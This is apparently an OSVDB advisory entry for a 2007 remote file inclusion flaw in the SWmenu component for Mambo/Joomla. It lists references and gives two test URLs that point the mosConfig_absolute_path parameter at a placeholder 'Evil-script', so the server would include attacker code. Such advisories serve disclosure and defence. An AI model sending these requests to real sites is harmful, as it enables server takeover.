SWmenu Component for Mambo / Joomla! administrator/components/ImageManager/Classes/ImageManager.php mosConfig_absolute_path Variable Remote File Inclusion

2007-03-23T00:00:00
ID OSVDB:38791
Type osvdb
Reporter OSVDB
Modified 2007-03-23T00:00:00

Description

Manual Testing Notes

http://[target]/[path]/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script? http://[target]/[path]/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script?

References:

Related OSVDB ID: 38790 Keyword: com_swmenufree Keyword: com_swmenupro ISS X-Force ID: 33204 Generic Exploit URL: http://www.milw0rm.com/exploits/3557 FrSIRT Advisory: ADV-2007-1100 CVE-2007-1699 Bugtraq ID: 23116